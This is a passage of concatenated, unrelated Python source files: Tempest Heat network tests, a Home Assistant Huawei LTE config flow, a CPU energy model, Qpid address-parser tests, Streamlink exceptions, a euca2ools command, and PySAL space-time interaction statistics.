router_id = self.test_resources.get('Router')['physical_resource_id']
body = self.network_client.show_router(router_id)
router = body['router']
self.assertEqual(self.neutron_basic_template['resources'][
'Router']['properties']['name'], router['name'])
self.assertEqual(self.external_network_id,
router['external_gateway_info']['network_id'])
self.assertEqual(True, router['admin_state_up'])
@test.idempotent_id('89f605bd-153e-43ee-a0ed-9919b63423c5')
@test.services('network')
def test_created_router_interface(self):
"""Verifies created router interface."""
router_id = self.test_resources.get('Router')['physical_resource_id']
network_id = self.test_resources.get('Network')['physical_resource_id']
subnet_id = self.test_resources.get('Subnet')['physical_resource_id']
body = self.network_client.list_ports()
ports = body['ports']
router_ports = filter(lambda port: port['device_id'] ==
router_id, ports)
created_network_ports = filter(lambda port: port['network_id'] ==
network_id, router_ports)
self.assertEqual(1, len(created_network_ports))
router_interface = created_network_ports[0]
fixed_ips = router_interface['fixed_ips']
subnet_fixed_ips = filter(lambda port: port['subnet_id'] ==
subnet_id, fixed_ips)
self.assertEqual(1, len(subnet_fixed_ips))
router_interface_ip = subnet_fixed_ips[0]['ip_address']
self.assertEqual(str(self.subnet_cidr.iter_hosts().next()),
router_interface_ip)
@test.idempotent_id('75d85316-4ac2-4c0e-a1a9-edd2148fc10e')
@test.services('compute', 'network')
def test_created_server(self):
"""Verifies created sever."""
server_id = self.test_resources.get('Server')['physical_resource_id']
server = self.servers_client.get_server(server_id)
self.assertEqual(self.keypair_name, server['key_name'])
self.assertEqual('ACTIVE', server['status'])
network = server['addresses'][self.neutron_basic_template['resources'][
'Network']['properties']['name']][0]
self.assertEqual(4, network['version'])
self.assertIn(netaddr.IPAddress(network['addr']), self.subnet_cidr)
|
"""Config flow for the Huawei LTE platform."""
from __future__ import annotations
import logging
from typing import Any
from urllib.parse import urlparse
from huawei_lte_api.AuthorizedConnection import AuthorizedConnection
from huawei_lte_api.Client import Client
from huawei_lte_api.Connection import GetResponseType
from huawei_lte_api.exceptions import (
LoginErrorPasswordWrongException,
LoginErrorUsernamePasswordOverrunException,
LoginErrorUsernamePasswordWrongException,
LoginErrorUsernameWrongException,
ResponseErrorException,
)
from requests.exceptions import Timeout
from url_normalize import url_normalize
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import ssdp
from homeassistant.const import (
CONF_MAC,
CONF_NAME,
CONF_PASSWORD,
CONF_RECIPIENT,
CONF_URL,
CONF_USERNAME,
)
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.typing import DiscoveryInfoType
from .const import (
CONF_TRACK_WIRED_CLIENTS,
CONF_UNAUTHENTICATED_MODE,
CONNECTION_TIMEOUT,
DEFAULT_DEVICE_NAME,
DEFAULT_NOTIFY_SERVICE_NAME,
DEFAULT_TRACK_WIRED_CLIENTS,
DEFAULT_UNAUTHENTICATED_MODE,
DOMAIN,
)
from .utils import get_device_macs
_LOGGER = logging.getLogger(__name__)
class ConfigFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle Huawei LTE config flow."""
VERSION = 3
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> OptionsFlowHandler:
"""Get options flow."""
return OptionsFlowHandler(config_entry)
async def _async_show_user_form(
self,
user_input: dict[str, Any] | None = None,
errors: dict[str, str] | None = None,
) -> FlowResult:
if user_input is None:
user_input = {}
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Required(
CONF_URL,
default=user_input.get(
CONF_URL,
self.context.get(CONF_URL, ""),
),
): str,
vol.Optional(
CONF_USERNAME, default=user_input.get(CONF_USERNAME) or ""
): str,
vol.Optional(
CONF_PASSWORD, default=user_input.get(CONF_PASSWORD) or ""
): str,
}
),
errors=errors or {},
)
async def async_step_import(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle import initiated config flow."""
return await self.async_step_user(user_input)
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle user initiated config flow."""
if user_input is None:
return await self._async_show_user_form()
errors = {}
# Normalize URL
user_input[CONF_URL] = url_normalize(
user_input[CONF_URL], default_scheme="http"
)
if "://" not in user_input[CONF_URL]:
errors[CONF_URL] = "invalid_url"
return await self._async_show_user_form(
user_input=user_input, errors=errors
)
conn: AuthorizedConnection
def logout() -> None:
try:
conn.user.logout()
except Exception: # pylint: disable=broad-except
_LOGGER.debug("Could not logout", exc_info=True)
def try_connect(user_input: dict[str, Any]) -> AuthorizedConnection:
"""Try connecting with given credentials."""
username = user_input.get(CONF_USERNAME) or ""
password = user_input.get(CONF_PASSWORD) or ""
conn = AuthorizedConnection(
user_input[CONF_URL],
username=username,
password=password,
timeout=CONNECTION_TIMEOUT,
)
return conn
def get_device_info() -> tuple[GetResponseType, GetResponseType]:
"""Get router info."""
client = Client(conn)
try:
device_info = client.device.information()
except Exception: # pylint: disable=broad-except
_LOGGER.debug("Could not get device.information", exc_info=True)
try:
device_info = client.device.basic_information()
except Exception: # pylint: disable=broad-except
_LOGGER.debug(
"Could not get device.basic_information", exc_info=True
)
device_info = {}
try:
wlan_settings = client.wlan.multi_basic_settings()
except Exception: # pylint: disable=broad-except
_LOGGER.debug("Could not get wlan.multi_basic_settings", exc_info=True)
wlan_settings = {}
return device_info, wlan_settings
try:
conn = await self.hass.async_add_executor_job(try_connect, user_input)
except LoginErrorUsernameWrongException:
errors[CONF_USERNAME] = "incorrect_username"
except LoginErrorPasswordWrongException:
errors[CONF_PASSWORD] = "incorrect_password"
except LoginErrorUsernamePasswordWrongException:
errors[CONF_USERNAME] = "invalid_auth"
except LoginErrorUsernamePasswordOverrunException:
errors["base"] = "login_attempts_exceeded"
except ResponseErrorException:
_LOGGER.warning("Response error", exc_info=True)
errors["base"] = "response_error"
except Timeout:
_LOGGER.warning("Connection timeout", exc_info=True)
errors[CONF_URL] = "connection_timeout"
except Exception: # pylint: disable=broad-except
_LOGGER.warning("Unknown error connecting to device", exc_info=True)
errors[CONF_URL] = "unknown"
if errors:
await self.hass.async_add_executor_job(logout)
return await self._async_show_user_form(
user_input=user_input, errors=errors
)
info, wlan_settings = await self.hass.async_add_executor_job(get_device_info)
await self.hass.async_add_executor_job(logout)
if not self.unique_id:
if serial_number := info.get("SerialNumber"):
await self.async_set_unique_id(serial_number)
self._abort_if_unique_id_configured()
else:
await self._async_handle_discovery_without_unique_id()
user_input[CONF_MAC] = get_device_macs(info, wlan_settings)
title = (
self.context.get("title_placeholders", {}).get(CONF_NAME)
or info.get("DeviceName") # device.information
or info.get("devicename") # device.basic_information
or DEFAULT_DEVICE_NAME
)
return self.async_create_entry(title=title, data=user_input)
async def async_step_ssdp(self, discovery_info: DiscoveryInfoType) -> FlowResult:
"""Handle SSDP initiated config flow."""
await self.async_set_unique_id(discovery_info[ssdp.ATTR_UPNP_UDN])
self._abort_if_unique_id_configured()
        # Attempt to distinguish from other non-LTE Huawei router devices; at
        # least the ones we are interested in have a "Mobile Wi-Fi" friendlyName.
if "mobile" not in discovery_info.get(ssdp.ATTR_UPNP_FRIENDLY_NAME, "").lower():
return self.async_abort(reason="not_huawei_lte")
url = url_normalize(
discovery_info.get(
ssdp.ATTR_UPNP_PRESENTATION_URL,
f"http://{urlparse(discovery_info[ssdp.ATTR_SSDP_LOCATION]).hostname}/",
)
)
if serial_number := discovery_info.get(ssdp.ATTR_UPNP_SERIAL):
await self.async_set_unique_id(serial_number)
self._abort_if_unique_id_configured()
else:
await self._async_handle_discovery_without_unique_id()
user_input = {CONF_URL: url}
self.context["title_placeholders"] = {
CONF_NAME: discovery_info.get(ssdp.ATTR_UPNP_FRIENDLY_NAME)
}
return await self._async_show_user_form(user_input)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Huawei LTE options flow."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Initialize options flow."""
self.config_entry = config_entry
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle options flow."""
# Recipients are persisted as a list, but handled as comma separated string in UI
if user_input is not None:
# Preserve existing options, for example *_from_yaml markers
data = {**self.config_entry.options, **user_input}
if not isinstance(data[CONF_RECIPIENT], list):
data[CONF_RECIPIENT] = [
x.strip() for x in data[CONF_RECIPIENT].split(",")
]
return self.async_create_entry(title="", data=data)
data_schema = vol.Schema(
{
vol.Optional(
CONF_NAME,
default=self.config_entry.options.get(
CONF_NAME, DEFAULT_NOTIFY_SERVICE_NAME
),
): str,
vol.Optional(
CONF_RECIPIENT,
default=", ".join(
self.config_entry.options.get(CONF_RECIPIENT, [])
),
): str,
vol.Optional(
CONF_TRACK_WIRED_CLIENTS,
default=self.config_entry.options.get(
CONF_TRACK_WIRED_CLIENTS, DEFAULT_TRACK_WIRED_CLIENTS
),
): bool,
vol.Optional(
CONF_UNAUTHENTICATED_MODE,
default=self.config_entry.options.get(
CONF_UNAUTHENTICATED_MODE, DEFAULT_UNAUTHENTICATED_MODE
),
): bool,
}
)
return self.async_show_form(step_id="init", data_schema=data_schema)
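# Example (illustrative): with user input CONF_RECIPIENT == "+123, +456",
# the comma split in async_step_init persists it as ["+123", "+456"].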
|
from energy_model import (ActiveState, EnergyModelNode, EnergyModelRoot,
PowerDomain, EnergyModel)
from collections import OrderedDict
silver_cpu_active_states = OrderedDict([
( 307200, ActiveState(capacity=149, power=90)),
( 384000, ActiveState(capacity=188, power=111)),
( 460800, ActiveState(capacity=225, power=133)),
( 537600, ActiveState(capacity=257, power=160)),
( 614400, ActiveState(capacity=281, power=182)),
( 691200, ActiveState(capacity=315, power=210)),
( 768000, ActiveState(capacity=368, power=251)),
( 844800, ActiveState(capacity=406, power=306)),
( 902400, ActiveState(capacity=428, power=332)),
( 979200, ActiveState(capacity=469, power=379)),
(1056000, ActiveState(capacity=502, power=438)),
(1132800, ActiveState(capacity=538, power=494)),
(1209600, ActiveState(capacity=581, power=550)),
(1286400, ActiveState(capacity=611, power=613)),
(1363200, ActiveState(capacity=648, power=670)),
(1440000, ActiveState(capacity=684, power=752)),
(1516800, ActiveState(capacity=729, power=848)),
(1593600, ActiveState(capacity=763, power=925)),
])
silver_cluster_active_states = OrderedDict([
( 307200, ActiveState(power=4)),
( 384000, ActiveState(power=4)),
( 460800, ActiveState(power=4)),
( 537600, ActiveState(power=4)),
( 614400, ActiveState(power=4)),
( 691200, ActiveState(power=4)),
( 768000, ActiveState(power=8)),
( 844800, ActiveState(power=9)),
( 902400, ActiveState(power=15)),
( 979200, ActiveState(power=16)),
(1056000, ActiveState(power=21)),
(1132800, ActiveState(power=22)),
(1209600, ActiveState(power=29)),
(1286400, ActiveState(power=32)),
(1363200, ActiveState(power=42)),
(1440000, ActiveState(power=49)),
# This power value is 41 (invalid!) in the released kernel. Patch it to
# avoid errors.
(1516800, ActiveState(power=52)),
(1593600, ActiveState(power=52)),
])
gold_cpu_active_states = OrderedDict([
( 307200, ActiveState(capacity=149, power=93)),
( 384000, ActiveState(capacity=188, power=111)),
( 460800, ActiveState(capacity=225, power=133)),
( 537600, ActiveState(capacity=257, power=160)),
( 614400, ActiveState(capacity=281, power=182)),
( 691200, ActiveState(capacity=315, power=210)),
( 748800, ActiveState(capacity=348, power=252)),
( 825600, ActiveState(capacity=374, power=290)),
( 902400, ActiveState(capacity=428, power=332)),
( 979200, ActiveState(capacity=469, power=379)),
(1056000, ActiveState(capacity=502, power=438)),
(1132800, ActiveState(capacity=538, power=494)),
(1209600, ActiveState(capacity=581, power=550)),
(1286400, ActiveState(capacity=611, power=613)),
(1363200, ActiveState(capacity=648, power=670)),
(1440000, ActiveState(capacity=684, power=752)),
(1516800, ActiveState(capacity=729, power=848)),
(1593600, ActiveState(capacity=763, power=925)),
(1670400, ActiveState(capacity=795, power=1018)),
(1747200, ActiveState(capacity=832, power=1073)),
(1824000, ActiveState(capacity=868, power=1209)),
(1900800, ActiveState(capacity=905, power=1298)),
(1977600, ActiveState(capacity=952, power=1428)),
(2054400, ActiveState(capacity=979, power=1521)),
(2150400, ActiveState(capacity=1024, power=1715)),
])
gold_cluster_active_states = OrderedDict([
( 307200, ActiveState(power=4)),
( 384000, ActiveState(power=4)),
( 460800, ActiveState(power=4)),
( 537600, ActiveState(power=4)),
( 614400, ActiveState(power=4)),
( 691200, ActiveState(power=4)),
( 748800, ActiveState(power=7)),
( 825600, ActiveState(power=10)),
( 902400, ActiveState(power=15)),
( 979200, ActiveState(power=16)),
(1056000, ActiveState(power=21)),
(1132800, ActiveState(power=22)),
(1209600, ActiveState(power=29)),
(1286400, ActiveState(power=32)),
(1363200, ActiveState(power=42)),
(1440000, ActiveState(power=49)),
# This power value is 41 (invalid!) in the released kernel. Patch it to
# avoid errors.
(1516800, ActiveState(power=52)),
(1593600, ActiveState(power=52)),
(1670400, ActiveState(power=62)),
(1747200, ActiveState(power=69)),
(1824000, ActiveState(power=75)),
(1900800, ActiveState(power=81)),
(1977600, ActiveState(power=90)),
(2054400, ActiveState(power=93)),
(2150400, ActiveState(power=96)),
])
cpu_idle_states = OrderedDict([
("WFI", 2),
("cpu-sleep-0", 0),
("cluster-sleep-0", 0),
])
cluster_idle_states = OrderedDict([
("WFI", 0),
("cpu-sleep-0", 0),
("cluster-sleep-0", 0),
])
silvers = [0, 1]
golds = [2, 3]
def silver_cpu_node(cpu):
return EnergyModelNode(cpu=cpu,
active_states=silver_cpu_active_states,
idle_states=cpu_idle_states)
def gold_cpu_node(cpu):
return EnergyModelNode(cpu=cpu,
active_states=gold_cpu_active_states,
idle_states=cpu_idle_states)
def cpu_pd(cpu):
return PowerDomain(cpu=cpu, idle_states=["WFI", "cpu-sleep-0"])
pixel_energy = EnergyModel(
root_node=EnergyModelRoot(children=[
EnergyModelNode(name='cluster_silver',
children=[silver_cpu_node(c) for c in silvers],
active_states=silver_cluster_active_states,
idle_states=cluster_idle_states),
EnergyModelNode(name='cluster_gold',
children=[gold_cpu_node(c) for c in golds],
active_states=gold_cluster_active_states,
idle_states=cluster_idle_states)]),
root_power_domain=PowerDomain(idle_states=[], children=[
PowerDomain(idle_states=['cluster-sleep-0'], children=[
cpu_pd(c) for c in silvers]),
PowerDomain(idle_states=['cluster-sleep-0'], children=[
cpu_pd(c) for c in golds])]),
freq_domains=[silvers, golds])
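if __name__ == "__main__":
    # Illustrative (not part of the original module): the peak capacities
    # encoded above; the gold CPUs top out at the canonical 1024.
    print(max(s.capacity for s in silver_cpu_active_states.values()))  # 763
    print(max(s.capacity for s in gold_cpu_active_states.values()))    # 1024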
|
from qpid.tests import Test
from qpid.messaging.address import lex, parse, ParseError, EOF, ID, NUMBER, \
SYM, WSPACE, LEXER
from qpid.lexer import Token
from qpid.harness import Skipped
from qpid.tests.parser import ParserBase
def indent(st):
return " " + st.replace("\n", "\n ")
def pprint_address(name, subject, options):
return "NAME: %s\nSUBJECT: %s\nOPTIONS: %s" % \
(pprint(name), pprint(subject), pprint(options))
def pprint(o):
if isinstance(o, dict):
return pprint_map(o)
elif isinstance(o, list):
return pprint_list(o)
elif isinstance(o, basestring):
return pprint_string(o)
else:
return repr(o)
def pprint_map(m):
items = ["%s: %s" % (pprint(k), pprint(v)) for k, v in m.items()]
items.sort()
return pprint_items("{", items, "}")
def pprint_list(l):
return pprint_items("[", [pprint(x) for x in l], "]")
def pprint_items(start, items, end):
if items:
return "%s\n%s\n%s" % (start, ",\n".join([indent(i) for i in items]), end)
else:
return "%s%s" % (start, end)
def pprint_string(s):
result = "'"
for c in s:
if c == "'":
result += "\\'"
elif c == "\n":
result += "\\n"
elif ord(c) >= 0x80:
result += "\\u%04x" % ord(c)
else:
result += c
result += "'"
return result
class AddressTests(ParserBase, Test):
EXCLUDE = (WSPACE, EOF)
def fields(self, line, n):
result = line.split(":", n - 1)
result.extend([None]*(n - len(result)))
return result
def call(self, parser, mode, input):
try:
from subprocess import Popen, PIPE, STDOUT
po = Popen([parser, mode], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
except ImportError, e:
raise Skipped("%s" % e)
except OSError, e:
raise Skipped("%s: %s" % (e, parser))
out, _ = po.communicate(input=input)
return out
def parser(self):
return self.config.defines.get("address.parser")
def do_lex(self, st):
parser = self.parser()
if parser:
out = self.call(parser, "lex", st)
lines = out.split("\n")
toks = []
for line in lines:
if line.strip():
name, position, value = self.fields(line, 3)
toks.append(Token(LEXER.type(name), value, position, st))
return toks
else:
return lex(st)
def do_parse(self, st):
return parse(st)
def valid(self, addr, name=None, subject=None, options=None):
parser = self.parser()
if parser:
got = self.call(parser, "parse", addr)
expected = "%s\n" % pprint_address(name, subject, options)
assert expected == got, "expected\n<EXP>%s</EXP>\ngot\n<GOT>%s</GOT>" % (expected, got)
else:
ParserBase.valid(self, addr, (name, subject, options))
def invalid(self, addr, error=None):
parser = self.parser()
if parser:
got = self.call(parser, "parse", addr)
expected = "ERROR: %s\n" % error
assert expected == got, "expected %r, got %r" % (expected, got)
else:
ParserBase.invalid(self, addr, error)
def testDashInId1(self):
self.lex("foo-bar", ID)
def testDashInId2(self):
self.lex("foo-3", ID)
def testDashAlone1(self):
self.lex("foo - bar", ID, SYM, ID)
def testDashAlone2(self):
self.lex("foo - 3", ID, SYM, NUMBER)
def testLeadingDash(self):
self.lex("-foo", SYM, ID)
def testTrailingDash(self):
self.lex("foo-", ID, SYM)
def testNegativeNum(self):
self.lex("-3", NUMBER)
def testIdNum(self):
self.lex("id1", ID)
def testIdSpaceNum(self):
self.lex("id 1", ID, NUMBER)
def testHash(self):
self.valid("foo/bar.#", "foo", "bar.#")
def testStar(self):
self.valid("foo/bar.*", "foo", "bar.*")
def testColon(self):
self.valid("foo.bar/baz.qux:moo:arf", "foo.bar", "baz.qux:moo:arf")
def testOptions(self):
self.valid("foo.bar/baz.qux:moo:arf; {key: value}",
"foo.bar", "baz.qux:moo:arf", {"key": "value"})
def testOptionsTrailingComma(self):
self.valid("name/subject; {key: value,}", "name", "subject",
{"key": "value"})
def testOptionsNone(self):
self.valid("name/subject; {key: None}", "name", "subject",
{"key": None})
def testSemiSubject(self):
self.valid("foo.bar/'baz.qux;moo:arf'; {key: value}",
"foo.bar", "baz.qux;moo:arf", {"key": "value"})
def testCommaSubject(self):
self.valid("foo.bar/baz.qux.{moo,arf}", "foo.bar", "baz.qux.{moo,arf}")
def testCommaSubjectOptions(self):
self.valid("foo.bar/baz.qux.{moo,arf}; {key: value}", "foo.bar",
"baz.qux.{moo,arf}", {"key": "value"})
def testUnbalanced(self):
self.valid("foo.bar/baz.qux.{moo,arf; {key: value}", "foo.bar",
"baz.qux.{moo,arf", {"key": "value"})
def testSlashQuote(self):
self.valid("foo.bar\\/baz.qux.{moo,arf; {key: value}",
"foo.bar/baz.qux.{moo,arf",
None, {"key": "value"})
def testSlashHexEsc1(self):
self.valid("foo.bar\\x00baz.qux.{moo,arf; {key: value}",
"foo.bar\x00baz.qux.{moo,arf",
None, {"key": "value"})
def testSlashHexEsc2(self):
self.valid("foo.bar\\xffbaz.qux.{moo,arf; {key: value}",
"foo.bar\xffbaz.qux.{moo,arf",
None, {"key": "value"})
def testSlashHexEsc3(self):
self.valid("foo.bar\\xFFbaz.qux.{moo,arf; {key: value}",
"foo.bar\xFFbaz.qux.{moo,arf",
None, {"key": "value"})
def testSlashUnicode1(self):
self.valid("foo.bar\\u1234baz.qux.{moo,arf; {key: value}",
u"foo.bar\u1234baz.qux.{moo,arf", None, {"key": "value"})
def testSlashUnicode2(self):
self.valid("foo.bar\\u0000baz.qux.{moo,arf; {key: value}",
u"foo.bar\u0000baz.qux.{moo,arf", None, {"key": "value"})
def testSlashUnicode3(self):
self.valid("foo.bar\\uffffbaz.qux.{moo,arf; {key: value}",
u"foo.bar\uffffbaz.qux.{moo,arf", None, {"key": "value"})
def testSlashUnicode4(self):
self.valid("foo.bar\\uFFFFbaz.qux.{moo,arf; {key: value}",
u"foo.bar\uFFFFbaz.qux.{moo,arf", None, {"key": "value"})
def testNoName(self):
self.invalid("; {key: value}",
"unexpected token SEMI(;) line:1,0:; {key: value}")
def testEmpty(self):
self.invalid("", "unexpected token EOF line:1,0:")
def testNoNameSlash(self):
self.invalid("/asdf; {key: value}",
"unexpected token SLASH(/) line:1,0:/asdf; {key: value}")
def testBadOptions1(self):
self.invalid("name/subject; {",
"expecting (NUMBER, STRING, ID, LBRACE, LBRACK, RBRACE), "
"got EOF line:1,15:name/subject; {")
def testBadOptions2(self):
self.invalid("name/subject; { 3",
"expecting COLON, got EOF "
"line:1,17:name/subject; { 3")
def testBadOptions3(self):
self.invalid("name/subject; { key:",
"expecting (NUMBER, STRING, ID, LBRACE, LBRACK), got EOF "
"line:1,20:name/subject; { key:")
def testBadOptions4(self):
self.invalid("name/subject; { key: value",
"expecting (COMMA, RBRACE), got EOF "
"line:1,26:name/subject; { key: value")
def testBadOptions5(self):
self.invalid("name/subject; { key: value asdf",
"expecting (COMMA, RBRACE), got ID(asdf) "
"line:1,27:name/subject; { key: value asdf")
def testBadOptions6(self):
self.invalid("name/subject; { key: value,",
"expecting (NUMBER, STRING, ID, LBRACE, LBRACK, RBRACE), got EOF "
"line:1,27:name/subject; { key: value,")
def testBadOptions7(self):
self.invalid("name/subject; { key: value } asdf",
"expecting EOF, got ID(asdf) "
"line:1,29:name/subject; { key: value } asdf")
def testList1(self):
self.valid("name/subject; { key: [] }", "name", "subject", {"key": []})
def testList2(self):
self.valid("name/subject; { key: ['one'] }", "name", "subject", {"key": ['one']})
def testList3(self):
self.valid("name/subject; { key: [1, 2, 3] }", "name", "subject",
{"key": [1, 2, 3]})
def testList4(self):
self.valid("name/subject; { key: [1, [2, 3], 4] }", "name", "subject",
{"key": [1, [2, 3], 4]})
def testBadList1(self):
self.invalid("name/subject; { key: [ }", "expecting (NUMBER, STRING, ID, LBRACE, LBRACK), "
"got RBRACE(}) line:1,23:name/subject; { key: [ }")
def testBadList2(self):
self.invalid("name/subject; { key: [ 1 }", "expecting (COMMA, RBRACK), "
"got RBRACE(}) line:1,25:name/subject; { key: [ 1 }")
def testBadList3(self):
self.invalid("name/subject; { key: [ 1 2 }", "expecting (COMMA, RBRACK), "
"got NUMBER(2) line:1,25:name/subject; { key: [ 1 2 }")
def testBadList4(self):
self.invalid("name/subject; { key: [ 1 2 ] }", "expecting (COMMA, RBRACK), "
"got NUMBER(2) line:1,25:name/subject; { key: [ 1 2 ] }")
def testMap1(self):
self.valid("name/subject; { 'key': value }",
"name", "subject", {"key": "value"})
def testMap2(self):
self.valid("name/subject; { 1: value }", "name", "subject", {1: "value"})
def testMap3(self):
self.valid('name/subject; { "foo.bar": value }',
"name", "subject", {"foo.bar": "value"})
def testBoolean(self):
self.valid("name/subject; { true1: True, true2: true, "
"false1: False, false2: false }",
"name", "subject", {"true1": True, "true2": True,
"false1": False, "false2": False})
|
import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.sio_eng.sio.resource import RESOURCE_PATH
from mi.dataset.driver.sio_eng.sio.sio_eng_sio_recovered_driver import parse
__author__ = 'jroy'
log = get_logger()
class DriverTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'STA15908.DAT')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
        self.assertEqual(particle_data_handler._failure, False)
if __name__ == '__main__':
test = DriverTest('test_one')
test.test_one()
|
class StreamlinkError(Exception):
"""Any error caused by Streamlink will be caught
with this exception."""
class PluginError(StreamlinkError):
"""Plugin related error."""
class NoStreamsError(StreamlinkError):
def __init__(self, url):
self.url = url
err = "No streams found on this URL: {0}".format(url)
Exception.__init__(self, err)
class NoPluginError(PluginError):
"""No relevant plugin has been loaded."""
class StreamError(StreamlinkError):
"""Stream related error."""
__all__ = ["StreamlinkError", "PluginError", "NoPluginError",
"NoStreamsError", "StreamError"]
|
from requestbuilder import Arg
from euca2ools.commands.ec2 import EC2Request
class DeleteDhcpOptions(EC2Request):
DESCRIPTION = 'Delete a VPC DHCP option set'
ARGS = [Arg('DhcpOptionsId', metavar='DHCPOPTS',
help='ID of the DHCP option set to delete (required)')]
|
"""
Methods for identifying space-time interaction in spatio-temporal event
data.
"""
__author__ = "Nicholas Malizia <nmalizia@asu.edu>"
import pysal
import numpy as np
import scipy.stats as stats
import pysal.weights.Distance as Distance
from pysal import cg
from pysal.spatial_dynamics import util
__all__ = ['SpaceTimeEvents', 'knox', 'mantel', 'jacquez', 'modified_knox']
class SpaceTimeEvents:
"""
Method for reformatting event data stored in a shapefile for use in
calculating metrics of spatio-temporal interaction.
Parameters
----------
path : string
the path to the appropriate shapefile, including the
file name, but excluding the extension
    time_col : string
               column header in the DBF file indicating the column
               containing the time stamp
Attributes
----------
n : int
number of events
x : array
n x 1 array of the x coordinates for the events
y : array
n x 1 array of the y coordinates for the events
t : array
n x 1 array of the temporal coordinates for the events
space : array
n x 2 array of the spatial coordinates (x,y) for the
events
time : array
n x 2 array of the temporal coordinates (t,1) for the
events, the second column is a vector of ones
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example shapefile data, ensuring to omit the file
extension. In order to successfully create the event data the .dbf file
associated with the shapefile should have a column of values that are a
timestamp for the events. There should be a numerical value (not a
date) in every field.
>>> path = pysal.examples.get_path("burkitt")
Create an instance of SpaceTimeEvents from a shapefile, where the
temporal information is stored in a column named "T".
>>> events = SpaceTimeEvents(path,'T')
See how many events are in the instance.
>>> events.n
188
Check the spatial coordinates of the first event.
>>> events.space[0]
array([ 300., 302.])
Check the time of the first event.
>>> events.t[0]
array([413])
"""
def __init__(self, path, time_col):
shp = pysal.open(path + '.shp')
dbf = pysal.open(path + '.dbf')
# extract the spatial coordinates from the shapefile
x = []
y = []
n = 0
for i in shp:
count = 0
for j in i:
if count == 0:
x.append(j)
elif count == 1:
y.append(j)
count += 1
n += 1
self.n = n
x = np.array(x)
y = np.array(y)
self.x = np.reshape(x, (n, 1))
self.y = np.reshape(y, (n, 1))
self.space = np.hstack((self.x, self.y))
# extract the temporal information from the database
t = np.array(dbf.by_col(time_col))
line = np.ones((n, 1))
self.t = np.reshape(t, (n, 1))
self.time = np.hstack((self.t, line))
# close open objects
dbf.close()
shp.close()
def knox(events, delta, tau, permutations=99):
"""
Knox test for spatio-temporal interaction. [1]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
delta : float
threshold for proximity in space
tau : float
threshold for proximity in time
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
Returns
-------
knox_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the knox test for the dataset
pvalue : float
pseudo p-value associated with the statistic
References
----------
.. [1] E. Knox. 1964. The detection of space-time
interactions. Journal of the Royal Statistical Society. Series C
(Applied Statistics), 13(1):25-30.
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
Set the random seed generator. This is used by the permutation based
inference to replicate the pseudo-significance of our example results -
the end-user will normally omit this step.
>>> np.random.seed(100)
Run the Knox test with distance and time thresholds of 20 and 5,
respectively. This counts the events that are closer than 20 units in
space, and 5 units in time.
>>> result = knox(events,delta=20,tau=5,permutations=99)
Next, we examine the results. First, we call the statistic from the
    results dictionary. This reports that there are 13 events close
in both space and time, according to our threshold definitions.
>>> print(result['stat'])
13.0
Next, we look at the pseudo-significance of this value, calculated by
permuting the timestamps and rerunning the statistics. In this case,
the results indicate there is likely no space-time interaction between
the events.
>>> print("%2.2f"%result['pvalue'])
0.18
"""
n = events.n
s = events.space
t = events.t
# calculate the spatial and temporal distance matrices for the events
sdistmat = cg.distance_matrix(s)
tdistmat = cg.distance_matrix(t)
# identify events within thresholds
spacmat = np.ones((n, n))
test = sdistmat <= delta
spacmat = spacmat * test
timemat = np.ones((n, n))
test = tdistmat <= tau
timemat = timemat * test
# calculate the statistic
knoxmat = timemat * spacmat
stat = (knoxmat.sum() - n) / 2
# return results (if no inference)
if permutations == 0:
return stat
distribution = []
# loop for generating a random distribution to assess significance
for p in range(permutations):
rtdistmat = util.shuffle_matrix(tdistmat, range(n))
timemat = np.ones((n, n))
test = rtdistmat <= tau
timemat = timemat * test
knoxmat = timemat * spacmat
k = (knoxmat.sum() - n) / 2
distribution.append(k)
# establish the pseudo significance of the observed statistic
distribution = np.array(distribution)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# return results
knox_result = {'stat': stat, 'pvalue': pvalue}
return knox_result
def mantel(events, permutations=99, scon=1.0, spow=-1.0, tcon=1.0, tpow=-1.0):
"""
Standardized Mantel test for spatio-temporal interaction. [2]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
scon : float
constant added to spatial distances
spow : float
value for power transformation for spatial distances
tcon : float
constant added to temporal distances
tpow : float
value for power transformation for temporal distances
Returns
-------
mantel_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
                    value of the Mantel test for the dataset
pvalue : float
pseudo p-value associated with the statistic
    References
    ----------
.. [2] N. Mantel. 1967. The detection of disease clustering and a
generalized regression approach. Cancer Research, 27(2):209-220.
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
Set the random seed generator. This is used by the permutation based
inference to replicate the pseudo-significance of our example results -
the end-user will normally omit this step.
>>> np.random.seed(100)
The standardized Mantel test is a measure of matrix correlation between
the spatial and temporal distance matrices of the event dataset. The
